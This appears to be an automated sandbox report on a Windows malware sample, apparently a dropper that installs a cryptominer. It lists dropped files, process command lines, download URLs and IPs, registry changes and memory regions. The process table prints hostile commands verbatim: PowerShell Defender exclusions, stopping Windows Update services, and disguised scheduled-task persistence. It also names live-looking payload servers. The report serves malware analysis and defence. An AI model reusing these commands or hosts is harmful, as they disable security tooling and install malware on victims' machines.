Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
lJ4EzPSKMj.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
initial sample
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\tdrpl[1].exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nxmr[1].exe
|
PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\1114023610.exe
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\1428024550.exe
|
PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\15714163.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\2573513776.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\28849683.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\415511255.exe
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\513318274.exe
|
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\5232.scr
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys
|
PE32+ executable (native) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe
|
PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\Windows\sysppvrdnvs.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\513318274.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\3[1]
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\5[1]
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\2[2]
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\4[1]
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\1[1]
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2g0ovzba.ck4.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4zdkoxb0.4wm.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5xrglguq.euj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_atmyihj1.4kz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_au04gmkt.xfz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cciqgpxe.5gk.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cg3cn0q3.kvs.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dngmtvlm.xdq.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e5eiy2yb.lui.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ehqiestd.4zy.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_emvog3gr.zdd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eotr4mrw.tzh.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_izpjwpkt.phw.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oaw40m54.qnu.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ox0yghyy.krn.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t02w1jsi.wsp.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tekviu5v.iod.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uf1fpcmy.w44.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ulen12qk.qzk.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vlcaedjg.vnr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\tbtnds.dat
|
OpenPGP Public Key
|
dropped
|
There are 33 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\lJ4EzPSKMj.exe
|
"C:\Users\user\Desktop\lJ4EzPSKMj.exe"
|
||
C:\Users\user\AppData\Local\Temp\5232.scr
|
"C:\Users\user\AppData\Local\Temp\5232.scr" /S
|
||
C:\Windows\sysppvrdnvs.exe
|
C:\Windows\sysppvrdnvs.exe
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath
$env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference
-ExclusionPath $env:USERPROFILE"
|
||
C:\Windows\SysWOW64\sc.exe
|
sc stop UsoSvc
|
||
C:\Windows\SysWOW64\sc.exe
|
sc stop WaaSMedicSvc
|
||
C:\Windows\SysWOW64\sc.exe
|
sc stop wuauserv
|
||
C:\Windows\SysWOW64\sc.exe
|
sc stop DoSvc
|
||
C:\Windows\SysWOW64\sc.exe
|
sc stop BITS /wait
|
||
C:\Windows\sysppvrdnvs.exe
|
"C:\Windows\sysppvrdnvs.exe"
|
||
C:\Users\user\AppData\Local\Temp\513318274.exe
|
C:\Users\user\AppData\Local\Temp\513318274.exe
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager"
/f
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\schtasks.exe
|
schtasks /delete /f /tn "Windows Upgrade Manager"
|
||
C:\Users\user\AppData\Local\Temp\2573513776.exe
|
C:\Users\user\AppData\Local\Temp\2573513776.exe
|
||
C:\Users\user\AppData\Local\Temp\28849683.exe
|
C:\Users\user\AppData\Local\Temp\28849683.exe
|
||
C:\Users\user\AppData\Local\Temp\15714163.exe
|
C:\Users\user\AppData\Local\Temp\15714163.exe
|
||
C:\Users\user\AppData\Local\Temp\1428024550.exe
|
C:\Users\user\AppData\Local\Temp\1428024550.exe
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2")
{ schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe'''
} Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe')
-Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate
-DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows
Security' -RunLevel 'Highest' -Force; }
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe
|
"C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2")
{ schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe'''
} Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe')
-Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate
-DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows
Security' -RunLevel 'Highest' -Force; }
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\System32\conhost.exe
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2")
{ schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe'''
} Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe')
-Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate
-DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows
Security' -RunLevel 'Highest' -Force; }
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\dwm.exe
|
C:\Windows\System32\dwm.exe
|
||
C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe
|
"C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2")
{ schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe'''
} Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe')
-Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate
-DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows
Security' -RunLevel 'Highest' -Force; }
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\reg.exe
|
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
|
There are 27 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://91.202.233.141/
|
unknown
|
||
http://185.215.113.66/
|
unknown
|
||
http://185.215.113.66/tdrpl.exe
|
185.215.113.66
|
||
http://185.215.113.66/5;
|
unknown
|
||
http://185.215.113.66/reg.php?s=%s
|
unknown
|
||
http://185.215.113.84/nxmr.exe
|
unknown
|
||
http://91.202.233.141/ALLBSTATAASASDMozilla/5.0
|
unknown
|
||
http://91.202.233.141/ALLBSTATAASASD00wWP
|
unknown
|
||
http://185.215.113.66/1F
|
unknown
|
||
http://185.215.113.84/nxmr.exeh
|
unknown
|
||
http://91.202.233.141/#
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
http://185.215.113.84/nxmr.exeP0
|
unknown
|
||
http://schemas.xmlsoap.org/soap/envelope/
|
unknown
|
||
http://91.202.233.141/1
|
unknown
|
||
http://91.202.233.141/2
|
unknown
|
||
http://185.215.113.66/tdrpl.execrC:
|
unknown
|
||
http://91.202.233.141/ALLBSTATAASASDX
|
unknown
|
||
http://185.215.113.66/2C:
|
unknown
|
||
http://91.202.233.141/5
|
unknown
|
||
http://91.202.233.141/3
|
unknown
|
||
http://91.202.233.141/4
|
unknown
|
||
http://185.215.113.66/4C:
|
unknown
|
||
http://185.215.113.66/tdrpl.exe#
|
unknown
|
||
http://91.202.233.141/3M
|
unknown
|
||
http://91.202.233.141/ALLBSTATAASASD_6
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://185.215.113.66/2D
|
unknown
|
||
http://91.202.233.141/ALLBSTATAASASD
|
unknown
|
||
http://91.202.233.141/2a
|
unknown
|
||
http://185.215.113.66/4ystem32
|
unknown
|
||
http://185.215.113.66/tdrpl.exe658-3693405117-2476756634-1003D9
|
unknown
|
||
http://www.microsoft.c
|
unknown
|
||
http://91.202.233.141/TLOADEDBROMozilla/5.0
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://91.202.233.141/ALLBSTATAASASD3
|
unknown
|
||
http://185.215.113.66/tdrpl.exeLMEM
|
unknown
|
||
http://185.215.113.66/q9
|
unknown
|
||
http://185.215.113.66/tdrpl.exe;
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
http://185.215.113.66/2_
|
unknown
|
||
http://91.202.233.141/ALLBSTATAASASD)
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://91.202.233.141/ALLBSTATAASASDui
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
http://185.215.113.66/http://91.202.233.141/12345%s%s%s:Zone.Identifier%userprofile%%windir%%s
|
unknown
|
||
http://185.215.113.66/2a
|
unknown
|
||
http://185.215.113.66/tdrpl.exeB
|
unknown
|
||
http://185.215.113.66/tdrpl.exeSSC:
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://185.215.113.66/5
|
unknown
|
||
http://185.215.113.84/nxmr.exe:
|
unknown
|
||
http://185.215.113.66/4
|
unknown
|
||
http://185.215.113.66/3
|
unknown
|
||
http://185.215.113.66/2
|
unknown
|
||
http://185.215.113.84/nxmr.exeP0A
|
unknown
|
||
http://185.215.113.66/2M
|
unknown
|
||
http://185.215.113.66/tdrpl.exeN
|
unknown
|
||
http://185.215.113.66/2P
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://185.215.113.66/1
|
unknown
|
||
http://185.215.113.66/5z
|
unknown
|
||
http://185.215.113.66/reg.php?s=%sMozilla/5.0
|
unknown
|
||
http://185.215.113.84/nxmr.exe5
|
unknown
|
||
http://185.215.113.66/1s
|
unknown
|
||
http://185.215.113.66/tdrp.exe%s:Zone.Identifier/c
|
unknown
|
||
http://185.215.113.84/nxmr.exeystem32
|
unknown
|
||
http://185.215.113.66/5C:
|
unknown
|
||
http://91.202.233.141/2)
|
unknown
|
||
http://185.215.113.84/
|
unknown
|
||
http://185.215.113.66/1KKC:
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://xmrig.com/docs/algorithms
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
http://185.215.113.66/tdrp.exe
|
unknown
|
||
http://185.215.113.66/2s
|
unknown
|
||
http://91.202.233.141/ALLBSTATAASASDyi2
|
unknown
|
||
http://91.202.233.141/6122658-3693405117-2476756634-1003
|
unknown
|
||
http://185.215.113.84/nxmr.exeW
|
unknown
|
There are 72 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
twizthash.net
|
185.215.113.66
|
||
15.164.165.52.in-addr.arpa
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
185.215.113.66
|
twizthash.net
|
Portugal
|
||
198.163.192.16
|
unknown
|
United States
|
||
91.202.233.141
|
unknown
|
Russian Federation
|
||
89.218.184.42
|
unknown
|
Kazakhstan
|
||
94.230.236.63
|
unknown
|
Uzbekistan
|
||
5.133.123.159
|
unknown
|
Russian Federation
|
||
217.30.162.161
|
unknown
|
Uzbekistan
|
||
90.156.162.72
|
unknown
|
Russian Federation
|
||
95.58.91.70
|
unknown
|
Kazakhstan
|
||
92.46.174.254
|
unknown
|
Kazakhstan
|
||
94.230.235.140
|
unknown
|
Uzbekistan
|
||
187.133.73.5
|
unknown
|
Mexico
|
||
117.236.188.177
|
unknown
|
India
|
||
95.56.76.10
|
unknown
|
Kazakhstan
|
||
90.156.160.86
|
unknown
|
Russian Federation
|
||
5.202.213.167
|
unknown
|
Iran (ISLAMIC Republic Of)
|
||
46.100.182.167
|
unknown
|
Iran (ISLAMIC Republic Of)
|
||
5.232.31.242
|
unknown
|
Iran (ISLAMIC Republic Of)
|
||
92.46.228.246
|
unknown
|
Kazakhstan
|
||
198.163.193.230
|
unknown
|
United States
|
||
5.76.120.41
|
unknown
|
Kazakhstan
|
||
78.137.95.224
|
unknown
|
Yemen
|
||
185.131.95.169
|
unknown
|
Iran (ISLAMIC Republic Of)
|
||
2.178.73.57
|
unknown
|
Iran (ISLAMIC Republic Of)
|
||
185.203.237.228
|
unknown
|
Russian Federation
|
||
95.59.165.102
|
unknown
|
Kazakhstan
|
||
59.91.192.122
|
unknown
|
India
|
||
198.163.193.96
|
unknown
|
United States
|
||
213.206.39.40
|
unknown
|
Uzbekistan
|
||
185.215.113.84
|
unknown
|
Portugal
|
||
37.254.242.74
|
unknown
|
Iran (ISLAMIC Republic Of)
|
||
45.248.160.159
|
unknown
|
India
|
||
145.249.227.150
|
unknown
|
Russian Federation
|
||
178.90.122.209
|
unknown
|
Kazakhstan
|
||
124.109.48.132
|
unknown
|
Pakistan
|
||
151.244.52.254
|
unknown
|
Iran (ISLAMIC Republic Of)
|
||
239.255.255.250
|
unknown
|
Reserved
|
||
2.181.31.167
|
unknown
|
Iran (ISLAMIC Republic Of)
|
||
80.191.218.209
|
unknown
|
Iran (ISLAMIC Republic Of)
|
There are 29 hidden IPs, click here to show them.
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center
|
FirewallOverride
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center
|
FirewallDisableNotify
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center
|
AntiSpywareOverride
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center
|
AntiVirusOverride
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center
|
AntiVirusDisableNotify
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center
|
UpdatesOverride
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center
|
UpdatesDisableNotify
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
|
Windows Settings
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
|
DisableWindowsUpdate
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
|
AlwaysAutoUpdate
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
|
OverrideNotice
|
||
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\BITS
|
Start
|
There are 2 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
496000
|
heap
|
page read and write
|
||
2595CEF2000
|
heap
|
page read and write
|
||
410000
|
unkown
|
page readonly
|
||
410000
|
unkown
|
page readonly
|
||
410000
|
unkown
|
page readonly
|
||
410000
|
unkown
|
page readonly
|
||
2595CF00000
|
heap
|
page read and write
|
||
410000
|
unkown
|
page readonly
|
||
132C000
|
heap
|
page read and write
|
||
7FF6687FB000
|
unkown
|
page read and write
|
||
410000
|
unkown
|
page readonly
|
||
F3D000
|
stack
|
page read and write
|
||
26E80A00000
|
trusted library allocation
|
page read and write
|
||
E5DBFE000
|
stack
|
page read and write
|
||
2595E7CA000
|
heap
|
page read and write
|
||
7FF68E6E9000
|
unkown
|
page readonly
|
||
7FFB4AF30000
|
trusted library allocation
|
page read and write
|
||
156CF2C6000
|
heap
|
page read and write
|
||
107E000
|
stack
|
page read and write
|
||
1DB4E000
|
stack
|
page read and write
|
||
7FFB4AAE4000
|
trusted library allocation
|
page read and write
|
||
26E81B7D000
|
trusted library allocation
|
page read and write
|
||
348E000
|
stack
|
page read and write
|
||
7FFB4AAD2000
|
trusted library allocation
|
page read and write
|
||
465F000
|
stack
|
page read and write
|
||
32E7000
|
heap
|
page read and write
|
||
24BEDBE000
|
stack
|
page read and write
|
||
24BED78000
|
stack
|
page read and write
|
||
B524B0E000
|
stack
|
page read and write
|
||
B523FBE000
|
stack
|
page read and write
|
||
7DF428280000
|
trusted library allocation
|
page execute and read and write
|
||
26EEAF61000
|
heap
|
page read and write
|
||
289A8982000
|
trusted library allocation
|
page read and write
|
||
26EEA550000
|
heap
|
page read and write
|
||
EFB000
|
stack
|
page read and write
|
||
9C000
|
stack
|
page read and write
|
||
A72DA73000
|
stack
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
1E1AFF76000
|
heap
|
page read and write
|
||
269216A0000
|
heap
|
page read and write
|
||
3314000
|
heap
|
page read and write
|
||
A72D7CF000
|
stack
|
page read and write
|
||
156B69D0000
|
trusted library allocation
|
page read and write
|
||
17CF000
|
stack
|
page read and write
|
||
26E90304000
|
trusted library allocation
|
page read and write
|
||
156CF2F8000
|
heap
|
page read and write
|
||
B523F3E000
|
stack
|
page read and write
|
||
26EEAFDD000
|
heap
|
page read and write
|
||
7FF68E6F5000
|
unkown
|
page write copy
|
||
7FFB4AE70000
|
trusted library allocation
|
page read and write
|
||
E5E57B000
|
stack
|
page read and write
|
||
302F000
|
stack
|
page read and write
|
||
156C6E42000
|
trusted library allocation
|
page read and write
|
||
1E198C04000
|
trusted library allocation
|
page read and write
|
||
7FFB4ACD0000
|
trusted library allocation
|
page read and write
|
||
7FFB4AE3A000
|
trusted library allocation
|
page read and write
|
||
289BFDA2000
|
heap
|
page read and write
|
||
156B5170000
|
heap
|
page read and write
|
||
A90000
|
unkown
|
page readonly
|
||
1E195CA0000
|
heap
|
page read and write
|
||
1E195F55000
|
heap
|
page read and write
|
||
7FF454450000
|
trusted library allocation
|
page execute and read and write
|
||
156CF09C000
|
heap
|
page read and write
|
||
7FFB4AFA0000
|
trusted library allocation
|
page read and write
|
||
156C6E36000
|
trusted library allocation
|
page read and write
|
||
289BFE14000
|
heap
|
page read and write
|
||
289BFE9D000
|
heap
|
page read and write
|
||
7BA000
|
heap
|
page read and write
|
||
289BFC20000
|
heap
|
page read and write
|
||
7FFB4AAEB000
|
trusted library allocation
|
page execute and read and write
|
||
331A000
|
heap
|
page read and write
|
||
7FFB4ACE0000
|
trusted library allocation
|
page execute and read and write
|
||
1E198CA0000
|
trusted library allocation
|
page read and write
|
||
299D000
|
stack
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
365E000
|
stack
|
page read and write
|
||
289C021E000
|
heap
|
page read and write
|
||
3C5F000
|
stack
|
page read and write
|
||
25960A8A000
|
heap
|
page read and write
|
||
2595E7F4000
|
heap
|
page read and write
|
||
156CEFFF000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
26EE8C40000
|
heap
|
page read and write
|
||
E5E47E000
|
stack
|
page read and write
|
||
7FFB4ADF0000
|
trusted library allocation
|
page read and write
|
||
7FFB4AD10000
|
trusted library allocation
|
page read and write
|
||
32FB000
|
heap
|
page read and write
|
||
3315000
|
heap
|
page read and write
|
||
7FFB4AE48000
|
trusted library allocation
|
page read and write
|
||
7FFB4AD60000
|
trusted library allocation
|
page read and write
|
||
7FF668D72000
|
unkown
|
page read and write
|
||
1E197BE8000
|
trusted library allocation
|
page read and write
|
||
343E000
|
stack
|
page read and write
|
||
81D000
|
heap
|
page read and write
|
||
26EEA540000
|
trusted library allocation
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
289A9217000
|
trusted library allocation
|
page read and write
|
||
26EE8CDD000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
1E1AFDB5000
|
heap
|
page read and write
|
||
26EEB396000
|
heap
|
page read and write
|
||
A91000
|
unkown
|
page execute read
|
||
7FF668D76000
|
unkown
|
page readonly
|
||
B523DB7000
|
stack
|
page read and write
|
||
7FFB4ACA7000
|
trusted library allocation
|
page read and write
|
||
2DA0000
|
heap
|
page read and write
|
||
414000
|
unkown
|
page write copy
|
||
D0D000
|
stack
|
page read and write
|
||
7FFB4AB10000
|
trusted library allocation
|
page read and write
|
||
156B6D78000
|
trusted library allocation
|
page read and write
|
||
7FFB4AF27000
|
trusted library allocation
|
page read and write
|
||
1E1977DB000
|
heap
|
page read and write
|
||
7E5000
|
unkown
|
page readonly
|
||
7FF6687FB000
|
unkown
|
page write copy
|
||
7FFB4AE64000
|
trusted library allocation
|
page read and write
|
||
149F000
|
stack
|
page read and write
|
||
AA4000
|
unkown
|
page read and write
|
||
12FC000
|
heap
|
page read and write
|
||
26E812E6000
|
trusted library allocation
|
page read and write
|
||
47A000
|
heap
|
page read and write
|
||
2596288A000
|
heap
|
page read and write
|
||
A72E0FE000
|
stack
|
page read and write
|
||
7FFB4AD60000
|
trusted library allocation
|
page read and write
|
||
26E80D1D000
|
trusted library allocation
|
page read and write
|
||
26EE8C8F000
|
heap
|
page read and write
|
||
7FFB4AE20000
|
trusted library allocation
|
page read and write
|
||
1E1AFEA4000
|
heap
|
page read and write
|
||
1E1B0002000
|
heap
|
page read and write
|
||
3390000
|
heap
|
page read and write
|
||
289A74E0000
|
trusted library allocation
|
page read and write
|
||
25961E8A000
|
heap
|
page read and write
|
||
26EE8C10000
|
heap
|
page read and write
|
||
289A7440000
|
trusted library section
|
page read and write
|
||
B523BFB000
|
stack
|
page read and write
|
||
7FF668D75000
|
unkown
|
page write copy
|
||
7DF4BDCC0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4AD70000
|
trusted library allocation
|
page read and write
|
||
156B4EF0000
|
heap
|
page read and write
|
||
2595CF5C000
|
heap
|
page read and write
|
||
7FFB4AE40000
|
trusted library allocation
|
page read and write
|
||
9B000
|
stack
|
page read and write
|
||
156C6E3A000
|
trusted library allocation
|
page read and write
|
||
2595E7D2000
|
heap
|
page read and write
|
||
1E1A7A2C000
|
trusted library allocation
|
page read and write
|
||
7FFB4ACD0000
|
trusted library allocation
|
page read and write
|
||
289A9193000
|
trusted library allocation
|
page read and write
|
||
7DF4A3520000
|
trusted library allocation
|
page execute and read and write
|
||
1520000
|
heap
|
page read and write
|
||
1E1A7CC3000
|
trusted library allocation
|
page read and write
|
||
289BFBC0000
|
heap
|
page execute and read and write
|
||
7E3000
|
heap
|
page read and write
|
||
3B1F000
|
stack
|
page read and write
|
||
289A5A65000
|
heap
|
page read and write
|
||
FF0000
|
heap
|
page read and write
|
||
3324000
|
heap
|
page read and write
|
||
